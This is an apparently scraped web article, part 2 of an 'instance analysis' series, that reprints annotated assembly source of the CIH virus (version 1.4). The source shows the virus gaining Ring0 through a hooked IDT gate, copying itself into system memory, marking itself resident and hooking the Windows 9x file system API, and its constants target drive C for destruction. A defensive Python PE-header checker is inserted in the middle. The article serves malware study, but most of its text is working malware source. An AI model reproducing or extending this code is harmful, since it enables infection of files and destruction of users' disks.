Virus program source code instance analysis-CIH virus [2]

Source: Internet
Author: User
The example code for part [2] of the CIH virus source analysis follows below.

OriginalAppEXE SEGMENT

; PE format executable file header (DOS header, DOS stub, PE header, one section header)
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h   ; "MZ"
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h   ; e_lfanew = 80h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh   ; DOS stub
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h   ; "This program cannot be run in DOS mode."
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h   ; "PE\0\0", machine 014ch (i386), 1 section
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h   ; SizeOfOptionalHeader = 0e0h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h   ; PE32 magic 010bh, SizeOfCode = 1000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h   ; AddressOfEntryPoint = 1000h, BaseOfCode = 1000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h   ; BaseOfData = 2000h, ImageBase = 400000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h   ; SectionAlignment = 1000h, FileAlignment = 200h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h   ; SizeOfImage = 2000h, SizeOfHeaders = 200h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h   ; Subsystem = 2 (Windows GUI)
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h   ; NumberOfRvaAndSizes = 16
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h   ; 16 empty data directories
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h   ; section name ".text"
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h   ; VirtualSize = 1000h, VirtualAddress = 1000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h   ; SizeOfRawData = 1000h, PointerToRawData = 200h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h   ; Characteristics = 60000020h (code, execute, read)
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h   ; padding up to SizeOfHeaders
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h   ; host entry point: a single "ret"
dd 00000000h, VirusSize

OriginalAppEXE ENDS
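The db rows above decode to a minimal PE32 host: a DOS header whose e_lfanew points at 80h, a PE header declaring one section, an entry point at RVA 1000h inside a .text section whose raw data starts at file offset 200h, and a body consisting of a single ret. As an added example, not code from the CIH source or from the original article, the Python script below transcribes those rows into a byte string, walks the DOS header, COFF header, optional header and section table, resolves the entry point to a file offset, and reports the checks an analyst runs first on a suspect executable: an entry point outside every section or inside a non-executable one, bytes appended past the last declared section, and a file shorter than its section table claims. The zero padding after the host's ret (the listing only spells out eight body bytes), the names parse_pe32, entry_file_offset and findings, and the two altered samples in the usage are my own constructions.

```python
"""PE32 header walk over the OriginalAppEXE stub (added example, not from the listing)."""
import struct
from dataclasses import dataclass
from typing import List, Optional

IMAGE_SCN_MEM_EXECUTE = 0x20000000

# Transcribed from the db rows: DOS header + DOS stub (0x80 bytes).
_DOS = bytes.fromhex(
    "4d5a900003000000" "04000000ffff0000" "b800000000000000" "4000000000000000"
    "0000000000000000" "0000000000000000" "0000000000000000" "0000000080000000"
    "0e1fba0e00b409cd" "21b8014ccd215468" "69732070726f6772" "616d2063616e6e6f"
    "742062652072756e" "20696e20444f5320" "6d6f64652e0d0d0a" "2400000000000000"
)
# "PE\0\0", COFF file header and PE32 optional header; the 16 empty data
# directories of the listing are the trailing bytes(128).
_PE = bytes.fromhex(
    "504500004c010100" "f168203500000000" "00000000e0000f01" "0b01050000100000"
    "0000000000000000" "0010000000100000" "0020000000004000" "0010000000020000"
    "0400000000000000" "0400000000000000" "0020000000020000" "0000000002000000"
    "0000100000100000" "0000100000100000" "0000000010000000"
) + bytes(128)
# Section header for .text (RVA 0x1000, 0x1000 raw bytes at offset 0x200,
# CODE|EXECUTE|READ), then padding up to SizeOfHeaders = 0x200.
_SECTION = bytes.fromhex(
    "2e74657874000000" "0010000000100000" "0010000000020000"
    "0000000000000000" "0000000020000060"
) + bytes(96)
HEADERS = _DOS + _PE + _SECTION
# Host body: the listing spells out `ret` (0c3h) plus seven zero bytes; the rest
# of the section's declared raw size is zero padding constructed here.
STUB_EXE = HEADERS + b"\xc3" + bytes(0x1000 - 1)


@dataclass
class Section:
    name: str
    virtual_size: int
    virtual_address: int
    raw_size: int
    raw_pointer: int
    characteristics: int

    def contains_rva(self, rva: int) -> bool:
        span = max(self.virtual_size, self.raw_size)
        return self.virtual_address <= rva < self.virtual_address + span


@dataclass
class PEInfo:
    image_base: int
    entry_rva: int
    size_of_headers: int
    sections: List[Section]
    file_size: int


def parse_pe32(data: bytes) -> PEInfo:
    """Validate the MZ/PE signatures and read the fields needed to locate code."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("not a PE32 optional header")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    size_of_headers = struct.unpack_from("<I", data, opt + 60)[0]
    sections = []
    for i in range(nsections):
        name, vsize, vaddr, rsize, rptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"),
                                vsize, vaddr, rsize, rptr, chars))
    return PEInfo(image_base, entry_rva, size_of_headers, sections, len(data))


def _section_for_rva(pe: PEInfo, rva: int) -> Optional[Section]:
    return next((s for s in pe.sections if s.contains_rva(rva)), None)


def entry_file_offset(pe: PEInfo) -> int:
    """File offset of the entry point, or -1 if no section maps it."""
    sec = _section_for_rva(pe, pe.entry_rva)
    return -1 if sec is None else pe.entry_rva - sec.virtual_address + sec.raw_pointer


def findings(pe: PEInfo) -> List[str]:
    """Header sanity checks that flag common signs of tampering with a host file."""
    out = []
    sec = _section_for_rva(pe, pe.entry_rva)
    if sec is None:
        out.append("entry point RVA lies outside every section")
    elif not sec.characteristics & IMAGE_SCN_MEM_EXECUTE:
        out.append(f"entry point in non-executable section {sec.name}")
    declared_end = max((s.raw_pointer + s.raw_size for s in pe.sections),
                       default=pe.size_of_headers)
    if pe.file_size > declared_end:
        out.append(f"{pe.file_size - declared_end} overlay bytes past the last section")
    elif pe.file_size < declared_end:
        out.append("file shorter than the section table declares (truncated)")
    return out


if __name__ == "__main__":
    info = parse_pe32(STUB_EXE)
    print(f"entry RVA {info.entry_rva:#x} -> file offset {entry_file_offset(info):#x}, "
          f"byte {STUB_EXE[entry_file_offset(info)]:#04x}")
    print("stub:", findings(info) or "clean")
    print("with 64 appended bytes:", findings(parse_pe32(STUB_EXE + b"\x90" * 64)))
```

The clean stub produces no findings; appending bytes after the declared end of .text, or cutting the body short, is reported immediately. Walking the section table this way is the starting point for seeing where a file's code actually lives, which is what the LoopOfMergeAllVirusCodeSection loop further down exploits in reverse when it reassembles the virus from the pieces it placed in the host.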
  
; Virus program starts
TRUE  = 1
FALSE = 0
DEBUG = FALSE

; The version number is 1.4.
MajorVirusVersion = 1                                    ; major version number
MinorVirusVersion = 4                                    ; minor version number
VirusVersion = MajorVirusVersion*10h+MinorVirusVersion   ; merged version number

IF DEBUG                                 ; debug build or not
FirstKillHardDiskNumber = 81h            ; destroys disk D
HookExceptionNumber     = 05h            ; interrupt used to enter Ring0
ELSE
FirstKillHardDiskNumber = 80h            ; destroys drive C
HookExceptionNumber     = 03h            ; interrupt 3 is used
ENDIF

FileNameBufferSize = 7fh

; The virus code segment starts.
VirusGame SEGMENT

ASSUME cs:VirusGame, ds:VirusGame, ss:VirusGame
ASSUME es:VirusGame, fs:VirusGame, gs:VirusGame

MyVirusStart:
push ebp

; Modify the system exception handling (the SEH chain at fs:[0]) to avoid error messages
lea  eax, [esp-04h*2]
xor  ebx, ebx
xchg eax, fs:[ebx]

call @0

@0:
pop ebx               ; get the load offset of the program; this offset + a relative offset gives the absolute address
lea ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax

; Modify the interrupt descriptor table to obtain Ring0 privileges
push eax
sidt [esp-02h]        ; store the IDT register below the stack pointer; the pop leaves the IDT base address in ebx
pop  ebx

add ebx, HookExceptionNumber*08h+04h   ; ebx = address of the hooked gate descriptor (its high dword)

cli                   ; disable interrupts before modifying the table

mov ebp, [ebx]        ; save the high dword of the original exception gate
mov bp, [ebx-04h]     ; save the low word of the original entry offset

lea esi, MyExceptionHook-@1[ecx]

push esi              ; esi is the address of the virus's interrupt routine

mov [ebx-04h], si
shr esi, 16           ; modify the exception gate
mov [ebx+02h], si     ; point the interrupt gate at the virus's interrupt routine

pop esi

; Raise the exception to enter Ring0
int HookExceptionNumber   ; enters Ring0 through the hooked interrupt
ReturnAddressOfEndException = $

; Merge all virus code sections
push esi
mov  esi, eax         ; esi points to the beginning of the virus

; Copy section by section
LoopOfMergeAllVirusCodeSection:
mov ecx, [eax-04h]

rep movsb             ; copy this piece of virus code into the allocated system memory
sub eax, 08h
mov esi, [eax]
or  esi, esi
jz  QuitLoopOfMergeAllVirusCodeSection   ; ZF = 1: no more pieces

jmp LoopOfMergeAllVirusCodeSection       ; copy the next piece

QuitLoopOfMergeAllVirusCodeSection:
pop esi
int HookExceptionNumber

; Restore exception handling
ReadyRestoreSE:
sti                   ; re-enable interrupts
xor ebx, ebx
jmp RestoreSE

; If an exception is raised here, the virus cannot run (for example under Windows NT) and control passes directly to the original program.
StopToRunVirusCode:
@1 = StopToRunVirusCode

xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]

RestoreSE:
pop dword ptr fs:[ebx]
pop eax

; Jump to the original program and run it normally
pop ebp

push 00401000h                        ; push the original program's entry address
OriginalAddressOfEntryPoint = $-4     ; the pushed dword holds the host's original entry point
ret                                   ; "return" into the beginning of the original program

; Virus initialization module
MyExceptionHook:
@2 = MyExceptionHook

jz InstallMyFileSystemApiHook   ; if the virus code has already been copied, install the file system hook

mov ecx, dr0                    ; check whether dr0 has been set (dr0 is the virus-resident flag)
jecxz AllocateSystemMemoryPage  ; not yet set: allocate system memory

add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException

; Return to the original program
ExitRing0Init:
mov [ebx-04h], bp
shr ebp, 16                     ; restore the exception gate
mov [ebx+02h], bp               ; restore the original interrupt entry address

iretd                           ; return from the interrupt

; Allocate the system memory to be used
AllocateSystemMemoryPage:
mov dr0, ebx                    ; mark the virus as resident in dr0
push 0000000fh                  ; flags
push ecx                        ; PhysAddr
push 0ffffffffh                 ; maxPhys
push ecx                        ; minPhys     calling convention: ULONG EXTERN _PageAllocate(ULONG nPages,
push ecx                        ; AlignMask   ULONG pType, ULONG VM, ULONG AlignMask, ULONG minPhys,
push ecx                        ; VM          ULONG maxPhys, ULONG *PhysAddr, ULONG flags);
push 000000001h                 ; pType
push 000000002h                 ; nPages
int 20h                         ; VxD call
_PageAllocate = $
dd 00010053h                    ; VMM service _PageAllocate; uses the eax, ecx, edx and flags registers
add esp, 08h*04h                ; restore the stack pointer (8 dword arguments)

xchg edi, eax                   ; edi points to the first address of the allocated system memory
lea  eax, MyVirusStart-@2[esi]  ; eax points to the beginning of the virus

iretd                           ; leave the interrupt

; Initialize the file system hook
InstallMyFileSystemApiHook:
lea eax, FileSystemApiHook-@6[edi]   ; points to the first address of the file system hook routine

push eax
int 20h                         ; VxD call IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $
dd 00400067h                    ; uses the eax, ecx, edx and flags registers

mov dr0, eax                    ; save the address of the previous file system hook in dr0
pop eax                         ; eax is the first address of the file system hook routine

; Save the original entry of the IFSMgr_InstallFileSystemApiHook function
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edx, [ecx]                  ; edx is the entry of IFSMgr_InstallFileSystemApiHook
mov OldInstallFileSystemApiHook-@3[eax], edx

; Modify the IFSMgr_InstallFileSystemApiHook entry
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax                  ; calls to IFSMgr_InstallFileSystemApiHook now go through InstallFileSystemApiHook
cli                             ; disable interrupts
